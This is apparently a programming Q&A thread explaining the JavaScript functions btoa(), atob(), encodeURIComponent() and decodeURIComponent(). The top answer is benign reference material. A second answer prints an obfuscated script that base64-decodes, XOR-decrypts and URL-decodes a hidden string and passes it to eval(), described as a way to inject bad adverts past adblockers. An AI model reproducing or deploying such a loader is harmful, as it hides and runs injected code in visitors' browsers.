# When to use btoa(), atob(), encodeURIComponent() and decodeURIComponent()?

Tags: javascript, browser, encoding

When would you use:

- [btoa()](https://developer.mozilla.org/en-US/docs/Web/API/WindowOrWorkerGlobalScope/btoa)
- [atob()](https://developer.mozilla.org/en-US/docs/Web/API/WindowOrWorkerGlobalScope/atob)
- [encodeURIComponent()](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/encodeURIComponent)
- [decodeURIComponent()](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/decodeURIComponent)

Are they supposed to be used together, eg:

```
atob(encodeURIComponent(...))
```

If not, when would `btoa()` and `atob()` be used and when would `encodeURIComponent()` and `decodeURIComponent()` be used?

Answer (score 7):

`btoa()` encodes a string of binary data in base-64 format. The most common use of this is for creating a `data:` URI from the contents of a file (e.g. turning a JPEG or GIF file into a `data:` URI that you incorporate directly into the page instead of referencing a remote file).

`atob()` performs the opposite: given a base-64 string, it returns the binary data.

`encodeURIComponent()` is used to perform URL-encoding of strings that will be used in a URI. This converts characters that have special meaning in URIs into `%` followed by the hex encoding, e.g. space becomes `%20`. This is usually used when creating URL parameters that will be used in redirects or AJAX requests, or the data that will be sent in `XMLHTTPRequest.send()`.

`decodeURIComponent()` performs the reverse of `encodeURIComponent()`, so if you have `"foo%20bar"` it will return `"foo bar"`.

It's pretty rare that you would need to use both URL-encoding and base-64 together for the same string.

Comment: Thanks for your reply. I appreciate it.

Comment: If you're dealing with unicode, it's not that rare: https://developer.mozilla.org/en-US/docs/Glossary/Base64#the_unicode_problem

Answer (score 1):

It's not rare. It's used to overcome adblockers and pass through firewall rules to insert bad adverts in pages. Check this out:

```
<script>eval(decodeURIComponent(Gg5C(atob("R1FxEgcICwcVBQUdUFlHXltcDRYeVkNRFg4eRVhITABUU3dZDA9VRXdXEAVVRRAKW0QCBxAPIEQAdhAKUhZZWVFXFU9RQVxMDU9CWkUWAwVUdVRWDARCdVpKBgRCEgcAR1MHVA1MAVlhAkRtR1MHEgd7R1MAEgcPAVl9dnpgVwxzVl0BLSdGUQ1gUBdnEgcPR1MJEgZ6R1FxEgcIR1Z0EgV5R1MA"),"ba0758")));function Gg5C(data,key){var result=[];for(var i=0;i<data.length;i++){var xored=data.charCodeAt(i)^key.charCodeAt(i%key.length);result.push(String.fromCharCode(xored));}return result.join("");}</script>
```

Comment: I'm not sure whether you are a spammer, or just someone educating the unwary about the use of these functions.

Comment: Up to the moment the only way to overcome this shit is to block dom or cookies, but you loose functionality of site. But I'm sure there is a way, any help appreciated!